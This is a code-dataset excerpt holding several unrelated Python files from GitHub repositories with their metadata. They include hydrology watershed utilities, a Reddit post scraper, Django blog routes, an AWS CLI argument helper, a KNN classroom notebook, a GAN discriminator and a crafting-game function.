huc2huc8comid_dict[huc2][huc8]=huc8comidselect\n return huc2huc8comid_dict\n \n else:\n huc8list=self.select_random_huc8(count=huc8count, huc2list=huc2list,seed=seed, evenshare=evenshare)\n for huc8 in huc8list:\n assert False, 'not developed'\n \n huc2comidselectdict={huc2:[] for huc2 in huc2list}\n huc2_comidcount=max([1,int(count/len(huc2list))])\n if evenshare:\n for huc2 in huc2list:\n huc2_huc8list=[]\n #huc2_huc8count=\n huc8_comidcount=max([1,huc2_comidcount/huc2_huc8count])\n \n \n \n \n \n \n def select_random_huc8(self,count=2,huc2list=None,seed=0,evenshare=1):\n if not seed is None:\n np.random.seed(seed)\n try:\n huchuc=self.huchuc\n except:\n huchuc=self.build_huchuc()\n huc2_huc8dict=huchuc['huc2_huc8dict']\n huc8_huc12dict=huchuc['huc8_huc12dict']\n huc2_huc8dict_select={}\n huc8_huc12dict_select={}\n \n if huc2list is None:\n huc2list=[huc2 for huc2 in huc2_huc8dict]\n else:\n for huc2,huc8list in huc2_huc8dict.items():\n if huc2 in huc2list:\n huc2_huc8dict_select[huc2]=huc8list\n for huc8 in huc8list:\n huc8_huc12dict_select[huc8]=huc8_huc12dict[huc8]\n huc2_huc8dict=huc2_huc8dict_select\n huc8_huc12dict=huc8_huc12dict_select\n \n if evenshare:\n huc2_huc8count=max([1,int(count/len(huc2list))]) # at least 1\n huc8_selection=[]\n for huc2 in huc2list:\n huc8list=huc2_huc8dict[huc2]\n shuffle(huc8list)\n huc8_selection.extend(huc8list[:huc2_huc8count])\n else:\n huc8list=[huc8 for huc8 in huc8_huc12dict]\n shuffle(huc8list)\n huc8_selection=huc8list[:count]\n \n huc8_huc12dict_finalselect={}\n \n for huc8 in huc8_selection:\n huc8_huc12dict_finalselect[huc8]=huc8_huc12dict[huc8]\n return huc8_huc12dict_finalselect\n \n \n \n def reverse_huc12comid(self):\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n \n self.rvrs_huc12comiddict={comid:huc12 for huc12,comidlist in self.huc12comiddict.items() for comid in comidlist }\n \n \n \n def build_huchuc(self):\n try:\n self.huchuc=self.anyNameDB(self.NHDhuchuc_path)\n if len(self.huchuc)==2:\n return self.huchuc\n else: self.logger.info(f'rebuilding huchuc')\n except: pass\n try: self.huc12comiddict\n except: self.gethuc12comiddict()\n huc2_huc8dict={}\n huc8_huc12dict={}\n \n for huc12 in self.huc12comiddict:\n a_huc8=huc12[0:8]\n a_huc2=huc12[0:2]\n try: \n huc8_huc12dict[a_huc8].append(huc12)\n except KeyError: # if huc8 is new\n huc8_huc12dict[a_huc8]=[huc12]\n try: # iff huc8 is new, add it to huc2 list\n huc2_huc8dict[a_huc2].append(a_huc8)\n except KeyError: # iff huc2 is new, create new dict entry for it too.\n huc2_huc8dict[a_huc2]=[a_huc8]\n except:\n self.logger.exception(f'unexpected error with huc12:{huc12}, a_huc8:{a_huc8}, a_huc2:{a_huc2}')\n except:\n self.logger.exception(f'unexpected error with huc12:{huc12}, a_huc8:{a_huc8}, a_huc2:{a_huc2}')\n huchuc={'huc2_huc8dict':huc2_huc8dict,'huc8_huc12dict':huc8_huc12dict}\n self.addtoDB(huchuc,self.NHDhuchuc_path)\n self.huchuc=huchuc\n return huchuc\n \n \n def checkNHDPlus(self,comid):\n try: self.NHDplus\n except: self.buildNHDplus(setNHDplus_attribute=1)\n message=f'checking NHDplus for comid:{comid}. '\n comidlist=self.NHDplus['COMID'].to_list()\n #huc12list=self.NHDplus['HUC12'].to_list()\n #huc8list=[huc12[0:8] for huc12 in huc12list]\n try:\n comid_data=self.NHDplus.iloc[comidlist.index(comid)]\n \n except ValueError:\n comid_data='comid not found'\n except:\n self.logger.exception('unexpected error')\n assert False, 'halt'\n message+=f'comid_data:{comid_data}'\n return message\n \n \n def buildNHDplus(self,setNHDplus_attribute=0):\n \n savefilename=self.NHDplus_path\n if os.path.exists(savefilename):\n try: \n NHDplus=self.anyNameDB(savefilename)['data']\n self.logger.info(f'opening {savefilename} with length:{len(NHDplus)} and type:{type(NHDplus)}')\n # self.logger.info(NHDplus)\n except: \n self.logger.info(f\"{savefilename} exists but could not open, rebuilding\")\n \n try: NHDplus\n except:\n filename=self.NHDdbf_path\n self.logger.info(f'starting read of {filename}')\n NHDplus=gpd.read_file(filename)\n self.logger.info('finished read of NHDplus')\n self.logger.info(f'opened {filename} with length:{len(NHDplus)} and type:{type(NHDplus)}')\n if os.path.exists(self.huc12comiddict_path):\n try: \n self.huc12comiddict=self.anyNameDB(self.huc12comiddict_path)\n assert len(self.huc12comiddict)>0,f'len huc12comiddict:{len(self.huc12comiddict)}'\n self.logger.info(f'opening {self.huc12comiddict_path} with length:{len(self.huc12comiddict)} and type:{type(self.huc12comiddict)}')\n # self.logger.info(self.huc12comiddict)\n if setNHDplus_attribute:\n self.NHDplus=NHDplus\n return \n except: \n self.logger.info(f\"{savefilename} exists but could not open, rebuilding\")\n\n self.logger.info(f'NHDplus.columns.values:{NHDplus.columns.values}')\n \n NHDplusHUC12array=NHDplus.loc[:,('HUC12')].to_numpy(dtype='str')\n self.logger.info('buildng huc12comiddict')\n huc12dict={}\n for comid_idx,huc12 in enumerate(NHDplusHUC12array):\n if len(huc12)==11:huc12='0'+huc12\n comid=NHDplus.loc[comid_idx,'COMID'].astype(str)\n if huc12 in huc12dict:\n huc12dict[huc12].append(comid)\n else: \n huc12dict[huc12]=[comid]\n self.addtoDB(huc12dict,self.huc12comiddict_path)\n self.addtoDB({'data':NHDplus},savefilename)\n self.huc12comiddict=huc12dict\n if setNHDplus_attribute:\n self.NHDplus=NHDplus\n return \n \n \n \n \n \n\n \n def getNHDplus(self,huc12):\n try: self.NHDplus\n except: self.buildNHDplus(setNHDplus_attribute=1)\n huc12dataframerows=self.NHDplus.loc[self.NHDplus['HUC12']==huc12]\n self.logger.info(f'type(huc12dataframerows):{type(huc12dataframerows)}')\n jsonfile=json.loads(huc12dataframerows.to_json())\n infodict={'NHDplusdata':jsonfile}\n return infodict\n \n \n \n \n \n \nif __name__==\"__main__\":\n gt=GeogTool()\n gt.buildNHDplus()\n huc12list=[key for key in gt.huc12comiddict]\n gt.logger.info(f'huc12list[0:10]:{huc12list[0:10]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[0]]:{gt.huc12comiddict[huc12list[0]]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[-1]]:{gt.huc12comiddict[huc12list[-1]]}')\n gt.logger.info(f'gt.huc12comiddict[huc12list[-1]]:{gt.huc12comiddict[\"030701010307\"]}')\n \n \n \n \n \n \n \n \n","repo_name":"DouglasPatton/kernelkernel","sub_path":"geogtools.py","file_name":"geogtools.py","file_ext":"py","file_size_in_byte":23628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"33434816542","text":"import pandas as pd\n\nfilename = \"vacancies_by_year.csv\"\ndata1 = pd.read_csv(filename)\ndate = lambda date: int(date[:4])\ndata1[\"years\"] = data1[\"published_at\"].apply(date)\nyears_unique = list(data1[\"years\"].unique())\n\nfor year in years_unique:\n data2 = data1[data1[\"years\"] == year]\n data2.iloc[:, :6].to_csv(f\"chunks\\\\chunk_{year}.csv\", index=False)","repo_name":"denperi/Anfilofev","sub_path":"3.2.1.py","file_name":"3.2.1.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16654416312","text":"# region Текст задания\n\n# В массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\n\n# endregion\n\n# region Формирование массива\n\nimport random\n\nSIZE = 10\nMIN_ITEM = 0\nMAX_ITEM = 100\narray = [random.randint(MIN_ITEM, MAX_ITEM) for _ in range(SIZE)]\n\n# endregion\n\n# инициализация переменных\nnumber_min = 0\nnumber_max = 0\n\n# цикл прохода массива и сравнения с болишм, меньшим числом\nfor item in range(len(array)):\n if array[item] > array[number_max]: # сравниваем числа в массиве,\n number_max = item # а сохраняем именно индекс, не само число\n elif array[item] < array[number_min]:\n number_min = item\n\n# вывод результата\nprint(f'Массив до изменеия\\n{array}')\narray[number_min], array[number_max] = array[number_max], array[number_min]\nprint(f'Массив после перестановки\\n{array}')\n\n","repo_name":"dmitriyVasilievich1986/home-work","sub_path":"Algorithm/Lesson_03/lesson_3-3.py","file_name":"lesson_3-3.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33589876044","text":"import praw\nimport urllib.request\nfrom datetime import datetime\nfrom time import sleep\nimport json\n\ndef get_reddit(credfile = 'reddit_credentials.json'):\n '''\n Initiate the connexion to Reddit API by using the reddit_credentials\n stored in credfile (json file).\n Credentials should be stored as:\n {\"client_id\":\"XX1234XXX\",\n \"client_secret\":\"xxx1234xxx\",\n \"user_agent\":\"linux:xxx (by /u/xxx)\"}\n '''\n with open(credfile) as json_data:\n cred = json.load(json_data)\n reddit = praw.Reddit(client_id= cred['client_id'],\n client_secret= cred ['client_secret'],\n user_agent= cred['user_agent'])\n return reddit\n\ndef get_data(reddit=None,sub='all', maxposts=10):\n '''\n Extracts one datapoint consisting of maxposts posts, from the targeted sub.\n For each post, it extracts:\n -number of ups (=karma)\n -number of Comments\n -thumbnail\n -age in minutes\n -title\n -subreddit where the post was posted (useful for r/all)\n In addition, the datapoint carries two metadata: timestamp of the record and targeted sub.\n '''\n if not reddit:\n reddit = get_reddit()\n\n limit_read = maxposts + 2 #read two more posts than asked, in case of stickies\n submissions = reddit.subreddit(sub).hot(limit=limit_read)\n thumbnailsfolder = 'thumbnails/'\n data = {\n 'ups':[],\n 'coms':[],\n 'thumbs':[],\n 'ages':[],\n 'titles':[],\n 'subs':[]\n }\n\n for submission in submissions:\n if not submission.stickied:\n data['ups'].append(submission.ups)\n data['coms'].append(submission.num_comments)\n data['titles'].append(submission.title)\n age = datetime.now() - datetime.fromtimestamp(submission.created_utc)\n age = divmod(age.total_seconds(), 60)[0] #age is in minutes\n data['ages'].append(age)\n try : #some posts dont have previews. Use _nopreview.png as backup.\n image_name = thumbnailsfolder + submission.name + '.jpg'\n image_url = submission.preview['images'][0]['resolutions'][0]['url']\n urllib.request.urlretrieve(image_url, image_name)\n except AttributeError:\n image_name = '_nopreview.png'\n data['thumbs'].append(image_name)\n data['subs'].append(submission.subreddit_name_prefixed) #useful for r/all\n\n #keep only maxposts nbr of posts, so remove the stickies if any\n for d in data:\n data[d] = data[d][:maxposts]\n\n data['timestamp'] = datetime.now().strftime(\"%b %d %Y %H:%M:%S\")\n data['sub'] = sub\n return data\n\ndef collect_data(sub='all',maxposts=10,interval_sec=30,duration_min=10,feedback=True,savefile=None):\n '''\n This module repeats the get_data function during the duration_min in minutes, at every interval_sec in seconds.\n feedback = True will print out a progress information.\n savefile must be a json file name to dump the data in. Data is dumped at each loop.\n Returns data_collec, a list of data from get_data.\n '''\n #TODO: Clear plot folder\n size = round((duration_min*60)/interval_sec)\n reddit = get_reddit()\n data_collec = []\n for n in range(size):\n data = get_data(reddit,sub,maxposts)\n data_collec.append(data)\n if feedback:\n print('{}/{} snapshot recorded on {}'.format(n+1,size,data['timestamp']))\n if savefile:\n with open(savefile, 'w') as f:\n json.dump(data_collec, f)\n if n!=size-1: #dont sleep if it's the last extract\n sleep(interval_sec)\n return data_collec\n\ndef offset_timestamp(data,delta_hours):\n '''\n Add (or remove if negative) delta_hours hours to data['timestamp'].\n Useful if your extract timestamp is not in the viewer excepted local time.\n Return one data point.\n '''\n from datetime import timedelta\n timestamp = datetime.strptime(data['timestamp'],\"%b %d %Y %H:%M:%S\")\n timestamp = timestamp + timedelta(hours=delta_hours)\n data['timestamp'] = timestamp.strftime(\"%b %d %Y %H:%M:%S\")\n return data\n\nif __name__ == '__main__':\n pass\n","repo_name":"1-Sisyphe/reddit-hot-recorder","sub_path":"hotcollect.py","file_name":"hotcollect.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"79"} +{"seq_id":"243323422","text":"#created in part2\nfrom django.urls import path\nfrom .views import (\n PostListView,\n PostDetailView,\n PostCreateView,\n PostUpdateView,\n PostDeleteView,\n UserPostListView\n )\nfrom . import views #this imports something from current directory, that is views.py that we just made\n\n\nurlpatterns = [\n #dont need any path, because this is for all blog sites\n #path('', views.home, name='blog-home'), #sends it to views.home where views is the thing we imported\n path('', PostListView.as_view(), name='blog-home'),\n path('user/', UserPostListView.as_view(), name='user-posts'),\n path('post//', PostDetailView.as_view(), name='post-detail'),\n path('post/new/', PostCreateView.as_view(), name='post-create'),\n path('post//update/', PostUpdateView.as_view(), name='post-update'),\n path('post//delete/', PostDeleteView.as_view(), name='post-delete'),\n path('about/', views.about, name='blog-about'), #handles blog/about\n]\n\n\n# /_.html\n# \tblog/post_list.html\n","repo_name":"seanmac11741/Sheendjangoblog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15987194021","text":"import copy\n\nfrom dataclasses import dataclass\nfrom typing import Optional\nfrom awscli.arguments import CustomArgument, CLIArgument\n\n\n@dataclass\nclass ArgumentParameters:\n name: str\n member: Optional[str] = None\n help_text: Optional[str] = None\n required: Optional[bool] = False\n\n\nclass InjectingArgument(CustomArgument):\n def __init__(self, serialized_name, original_member_name, **kwargs):\n self._serialized_name = serialized_name\n self._original_member_name = original_member_name\n super().__init__(**kwargs)\n\n def add_to_params(self, parameters, value):\n if value is None:\n pass\n wrapped_value = {self._original_member_name: value}\n if parameters.get(self._serialized_name):\n parameters[self._serialized_name].update(wrapped_value)\n else:\n parameters[self._serialized_name] = wrapped_value\n\n\nclass OriginalArgument(CLIArgument):\n def __init__(self, original_member_name, error_message, **kwargs):\n self._serialized_name = kwargs.get(\"serialized_name\")\n self._original_member_name = original_member_name\n self._error_message = error_message\n super().__init__(**kwargs)\n\n def add_to_params(self, parameters, value):\n if value is None:\n return\n\n unpacked = self._unpack_argument(value)\n if self._original_member_name in unpacked and self._error_message:\n raise ValueError(self._error_message)\n\n if parameters.get(self._serialized_name):\n parameters[self._serialized_name].update(unpacked)\n else:\n parameters[self._serialized_name] = unpacked\n\n\nclass BinaryBlobArgumentHoister:\n def __init__(\n self,\n new_argument: ArgumentParameters,\n original_argument: ArgumentParameters,\n error_if_original_used: Optional[str] = None,\n ):\n self._new_argument = new_argument\n self._original_argument = original_argument\n self._error_message = error_if_original_used\n\n def __call__(self, session, argument_table, **kwargs):\n argument = argument_table[self._original_argument.name]\n model = copy.deepcopy(argument.argument_model)\n del model.members[self._original_argument.member]\n\n argument_table[self._new_argument.name] = InjectingArgument(\n argument._serialized_name,\n self._original_argument.member,\n name=self._new_argument.name,\n help_text=self._new_argument.help_text,\n cli_type_name=\"blob\",\n required=self._new_argument.required,\n )\n argument_table[self._original_argument.name] = OriginalArgument(\n self._original_argument.member,\n self._error_message,\n name=self._original_argument.name,\n argument_model=model,\n operation_model=argument._operation_model,\n is_required=self._original_argument.required,\n event_emitter=session.get_component(\"event_emitter\"),\n serialized_name=argument._serialized_name,\n )\n","repo_name":"aws/aws-cli","sub_path":"awscli/customizations/binaryhoist.py","file_name":"binaryhoist.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"} +{"seq_id":"37318396274","text":"from tkinter import *\n\napp = Tk()\nresult = 0\n\n\ndef setTextInput(input_elem, result):\n input_elem.delete(0, \"end\")\n input_elem.insert(0, result)\n\n\ndef convertKmToMile():\n global result\n result = float(inputKM.get()) * 0.609344\n setTextInput(inputMile, result)\n\n\ndef convertMileToKm():\n global result\n result = float(inputMile.get()) * 1.609344\n setTextInput(inputKM, result)\n\n\ninputDirKM = StringVar(None)\ninputKM = Entry(app, textvariable=inputDirKM, width=30)\ninputKM.grid(row=1, column=1)\n\nlabelTextKM = StringVar()\nlabelTextKM.set('Km')\nlabelDirKM = Label(app, textvariable=labelTextKM)\nlabelDirKM.grid(row=1, column=2)\n\n\ninputDirMile = StringVar(None)\ninputMile = Entry(app, textvariable=inputDirMile, width=30)\ninputMile.grid(row=1, column=3)\n\nlabelTextMile = StringVar()\nlabelTextMile.set(\"Mile\")\nlabelDirMile = Label(app, textvariable=labelTextMile)\nlabelDirMile.grid(row=1, column=4)\n\nkm = Button(app, text=\"Km -> Mile\", command=convertKmToMile)\nmile = Button(app, text=\"Km <- Mile\", command=convertMileToKm)\n\nkm.grid(row=2, column=1)\nmile.grid(row=2, column=3)\n\napp.mainloop()\n","repo_name":"jos50275266/Python_Assignment","sub_path":"Homework_9/homework_9_3.py","file_name":"homework_9_3.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35981127430","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # 4.1 NumPy ndarray : 다차원 배열 객체\n\n# In[1]:\n\n\nimport numpy as np\n\n\n# # 4.1.3 nd array 생성\n\n# In[2]:\n\n\ndata1=[6,7.5,8,0,1]\n\n\n# In[3]:\n\n\narr1 = np.array(data1)\n\n\n# In[4]:\n\n\narr1\n\n\n# In[6]:\n\n\ntype(arr1)\n\n\n# In[7]:\n\n\ntype(data1)\n\n\n# In[8]:\n\n\ndata2=[[1,2,3,4],[5,6,7,8]]\n\n\n# In[14]:\n\n\n# ㅣ = 리스트, n = npararray\n\n\n# In[9]:\n\n\nl = [[1,2,3],[4,5,6]]\nl2 = [[1,2,3],[4,5,6]]\nn = np.array(l)\nn2 = np.array(l)\n\n\n# In[10]:\n\n\nprint(l)\nprint(n)\n\n\n# In[11]:\n\n\nprint(n + n2)\n\n\n# In[12]:\n\n\nprint(n*2)\n\n\n# In[13]:\n\n\nprint(l*2)\n\n\n# In[15]:\n\n\nimport numpy as np\n\n\n# In[16]:\n\n\nr = [4,2,1]\nb = [5,1,0]\n\n\n# In[18]:\n\n\nr1 = np.array(r)\nb1 = np.array(b)\n\n\n# In[21]:\n\n\nprint(r)\nprint(b)\n\nprint(r1)\nprint(b1)\n\n\n# In[44]:\n\n\nsamples = np.random.normal(size=(8,3))\n\n\n# In[45]:\n\n\nprint(samples)\n\n\n# # ※ KNN 실습\n\n# In[25]:\n\n\nimport matplotlib.pyplot as pit\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[76]:\n\n\npit.plot([1,2,3,4],[1,2,3,4])\n\n\n# In[66]:\n\n\npit.plot(1,2,marker='o', linestyle='',color='red')\npit.plot(1,3,marker='o', linestyle='',color='red')\npit.plot(2,2,marker='o', linestyle='',color='blue')\n\n\n# In[65]:\n\n\npit.plot(samples, linestyle='')\n\n\n# # 내가 한 것\n\n# In[129]:\n\n\nfor i in range(0,50):\n sample1 = np.random.normal(1)\n sample2 = np.random.normal(1)\n \n if(i % 2 == 0):\n cir = 'red'\n else:\n cir = 'blue'\n \n pit.plot(sample1,sample2, marker = 'o', color = cir)\n\n\n# # 교수님 하신거\n\n# In[215]:\n\n\nimport random\n\n\n# In[216]:\n\n\nr = [] #여자 1\nb = [] #남자 2\nfor i in range(50):\n r.append([random.randint(40,70),random.randint(140,180),1])\n b.append([random.randint(60,90),random.randint(160,200),0])\n\n\n# In[214]:\n\n\nfor i in range(50):\n pit.plot(r[i][0], r[i][1], marker ='o', color = 'red')\n pit.plot(b[i][0], b[i][1], marker ='o', color = 'blue')\n \nnew = [55,170,1] # 여자\npit.plot(new[0],new[1],marker='x',color='black')\n\n\n# # 거리 구하는 함수\n\n# In[133]:\n\n\ndist = np.sqrt(\n pow((new[0]-r[0][0]),2)\n +pow((new[1]-r[0][1]),2) \n)\n\n\n# In[134]:\n\n\nprint(dist)\n\n\n# In[137]:\n\n\ndef distance(x,y):\n return int (np.sqrt(pow((x[0]-y[0]),2) +pow((x[1]-y[1]),2)))\n\n\n# In[139]:\n\n\ndistance (new, r[0])\n\n\n# In[142]:\n\n\nresult = []\nfor i in range(50):\n result.append([distance(new, r[i]), r[1][2]])\n result.append([distance(new, b[i]), b[1][2]])\n\n\n# In[152]:\n\n\nresult.sort()\nprint(result)\n\n\n# # 1. 키를 입력해주세요\n# \n# # 2. 몸무게를 입력해주세요\n# \n# # 3. K의 개수를 입력해주세요\n# \n# # #. 당신은 남자 혹은 여자입니다.\n\n# In[ ]:\n\n\n\n\n\n# In[235]:\n\n\ndef distance(x,y):\n #주 점 사이의 거리를 구하는 함수\n return np.sqrt(pow((x[0]-y[0]),2)+pow((x[1]-y[1]),2))\n\ndef knn(x,y,k):\n result = []\n cnt = 0\n for i in range(len(y)):\n result.append([distance(x,y[i]),y[1][2]])\n result.sort()\n for i in range(k):\n if(result[i][1]==1):\n cnt +=1\n if(cnt > (k/2)):\n print(\"당신은 여자입니다.\")\n else:\n print(\"당신은 남자입니다.\")\n\n\n# In[236]:\n\n\nweight = input(\"몸무게를 입력해주세요. \")\n\n\n# In[237]:\n\n\nheight = input(\"키를 입력해주세요. \")\n\n\n# In[238]:\n\n\nnum = input(\"k를 입력해주세요. \")\n\n\n# In[239]:\n\n\nnew = [int(weight), int(height)]\n\n\n# In[240]:\n\n\nknn(new, r+b, int(num))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ahnsugi/hh","sub_path":"옛날거/08-22.py","file_name":"08-22.py","file_ext":"py","file_size_in_byte":3384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15708502022","text":"from re import L\nimport streamlit as st \nimport pandas as pd\nimport numpy as np\n# static\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n \n\nst.set_page_config(page_title=\"Dashboard\", page_icon=\"📊\")\n\nhide_streamlit_style = \"\"\"\n \n \"\"\"\nst.markdown(hide_streamlit_style, unsafe_allow_html=True)\n\n \nst.markdown(\"## 4. All catergorical Faetures\")\n\n # load the data\ndf = pd.read_csv('./save_folder/tips.csv')\n\n# streamlit widgets and charts \ndata_types = df.dtypes\ncat_cols = tuple(data_types[data_types == 'object'].index)\n### \nwith st.container():\n # 1. include all categorical features (multiselect)\n # 2. bar, area, line (selectbox)\n # 3. stacked (radio)\n c1, c2 , c3 = st.columns(3)\n with c1:\n group_cols = st.multiselect('select the features',cat_cols,cat_cols[0])\n features_to_groupby = group_cols\n n_features = len(features_to_groupby)\n \n with c2:\n chart_type = st.selectbox('Select Chart type',\n ('bar','area','line'))\n \n with c3:\n stack_option = st.radio('Stacked',('Yes','No'))\n if stack_option == 'Yes':\n stacked = True\n else:\n stacked = False\n \n\n feature = ['total_bill']\n select_cols = feature+features_to_groupby\n avg_total_bill = df[select_cols].groupby(features_to_groupby).mean()\n if n_features >1:\n for i in range(n_features-1):\n avg_total_bill = avg_total_bill.unstack()\n \n avg_total_bill.fillna(0,inplace=True)\n \n # visual\n fig, ax = plt.subplots()\n avg_total_bill.plot(kind=chart_type,ax=ax,stacked=stacked)\n ax.legend(loc='center left',bbox_to_anchor=(1.0,0.5))\n ax.set_ylabel('Avg Total Bill')\n st.pyplot(fig)\n\n with st.expander('click here to display values'):\n st.dataframe(avg_total_bill)\n ","repo_name":"niranjanpansare/streamlit-dataVistualization","sub_path":"pages/6_📊_All_Catergorical_Features.py","file_name":"6_📊_All_Catergorical_Features.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39991457345","text":"\"\"\"module for auxillary networks\"\"\"\nimport functools\n\nimport torch\nfrom torch import nn\n\n\n# Defines the PatchGAN discriminator with the specified arguments.\nclass NLayerDiscriminator(nn.Module):\n \"\"\"https://github.com/CDOTAD/AlphaGAN-Matting/blob/fa0f4ee3515ed49a10faf10e252d29e8055b8769/\n model/NLayerDiscriminator.py#L7\n \"\"\"\n\n def __init__(\n self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, use_sigmoid=False\n ):\n super().__init__()\n if isinstance(norm_layer, functools.partial):\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kernel = 4\n padw = 1\n sequence = [\n nn.Conv2d(input_nc, ndf, kernel_size=kernel, stride=2, padding=padw),\n nn.LeakyReLU(0.2),\n ]\n nf_mult = 1\n nf_mult_prev = 1\n for layer_index in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** layer_index, 8)\n sequence += [\n nn.Conv2d(\n ndf * nf_mult_prev,\n ndf * nf_mult,\n kernel_size=kernel,\n stride=2,\n padding=padw,\n bias=use_bias,\n ),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2),\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(\n ndf * nf_mult_prev,\n ndf * nf_mult,\n kernel_size=kernel,\n stride=1,\n padding=padw,\n bias=use_bias,\n ),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2),\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kernel, stride=1, padding=padw)\n ]\n\n if use_sigmoid:\n sequence += [nn.Sigmoid()]\n\n self.model = nn.Sequential(*sequence)\n self._initialize_weights()\n\n def _initialize_weights(self):\n for module in self.modules():\n if isinstance(module, nn.Conv2d):\n nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n nn.init.constant_(module.bias, 0)\n elif isinstance(module, nn.BatchNorm2d):\n nn.init.constant_(module.weight, 1)\n nn.init.constant_(module.bias, 0)\n\n def forward(self, inputs: torch.Tensor) -> torch.Tensor:\n \"\"\"forward pass for the neural network\"\"\"\n return self.model(inputs)\n\n\nif __name__ == \"__main__\":\n Disc = NLayerDiscriminator(input_nc=4, n_layers=4, norm_layer=nn.BatchNorm2d)\n","repo_name":"Anuj040/matte","sub_path":"src/model/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72203834176","text":"import time\n\n\ndef craft_item(inventory, recipes, needed_time_per_item):\n item_to_craft, count = input(\"What do you want to craft?: (steel*1)\").split(\"*\")\n all_craftable_things = {}\n ressources_for_crafting = {}\n # get all craftable items in a dictonary -> key = repair tool -- value = tool\n for item in recipes.keys():\n all_craftable_things[item.split(\"|\")[0]] = item.split(\"|\")[1]\n # get recipe for user's item\n recipe = recipes.get(item_to_craft + \"|\" + all_craftable_things.get(item_to_craft))\n # save all ressources for crafting in a list\n if item_to_craft in all_craftable_things.keys():\n for item in recipe:\n ressources_for_crafting[item.split(\"*\")[0]] = float(item.split(\"*\")[1]) * int(count)\n print(ressources_for_crafting)\n # check if user has all items he needs\n new_inv = delete_items_from_inventory(inventory=inventory[\"items\"], inventory_to_delete=ressources_for_crafting)\n if not new_inv[0]:\n # returns exeption to user\n return new_inv[1], False\n else:\n # wait until crafting time is over\n print(f\"crafting... Needed time: {needed_time_per_item * float(count)}\")\n time.sleep(needed_time_per_item * float(count))\n # delete ressources from inventory\n inventory[\"items\"] = new_inv[1]\n # append new item to inventory\n if all_craftable_things.get(item_to_craft) == \"tools\":\n # count becomes durability\n count = 100\n # check if user already has the crafted item in the inventory\n if item_to_craft in inventory[all_craftable_things.get(item_to_craft)]:\n inventory[all_craftable_things.get(item_to_craft)][item_to_craft] += float(count)\n else:\n inventory[all_craftable_things.get(item_to_craft)][item_to_craft] = float(count)\n return inventory, True\n else:\n return \"The item doesn't exists!\", False\n\n\ndef delete_items_from_inventory(inventory, inventory_to_delete):\n # loops through each item for the ressources in the recipe\n for item, count in inventory_to_delete.items():\n # checks if user has the item\n if item in inventory.keys():\n # checks if user has the count of the items\n if float(inventory.get(item)) >= float(count):\n if float(inventory.get(item)) == float(count):\n # delete item from inv\n inventory.pop(item)\n else:\n inventory[item] -= count\n else:\n return False, f\"You don't have {count} of {item}. You only have {inventory.get(item)}\"\n else:\n return False, f\"You don't have the item {item} in you're inventory, which you need\"\n\n return True, inventory\n\n\n### EXAMPLE USAGE ####\nexample = False\nif example:\n recipes = {\n \"steel|items\": [\"iron*1\", \"match*1\"],\n \"match|items\": [\"stick*1\", \"coal*0.25\"],\n \"stick|items\": [\"wood*1\"],\n \"engine|items\": [\"steel*10\", \"copper wire*5\", \"fuel tank*1\", \"spark plug*1\"],\n \"spark plug|items\": [\"cooper*5\", \"nickel*2\", \"insulator*1\"],\n \"insulator|items\": [\"rubber*5\", \"glass*2\"],\n \"glass|items\": [\"sand*1\", \"match*1\"],\n \"cooper wire|items\": [\"cooper*2\"],\n \"fuel tank|items\": [\"rubber*2\", \"steel*5\"],\n \"repair kit|tools\": [\"insulator*1\", \"nickel*1\"]\n }\n inventory = {\"tools\": {\"pickaxe\": 100.0, \"wrench\": 100, \"shovel\": 92.5, \"axe\": 95.0},\n \"items\": {\"stone\": 4.0, \"stick\": 2.0, \"rubber\": 10, \"iron\": 9.0, \"match\": 3, \"sand\": 15, \"coal\": 50,\n \"insulator\": 1, \"nickel\": 23, \"steel\": 2}}\n needed_time = 0.25\n craft_itemm = craft_item(inventory, recipes, needed_time)\n if craft_itemm[1]:\n inventory = craft_itemm[0]\n else:\n print(craft_itemm[0])\n print(inventory)\n","repo_name":"BennoCrafter/ItemManufactory","sub_path":"commands/craft_item.py","file_name":"craft_item.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"17617245247","text":"import uuid\n\n\ndef 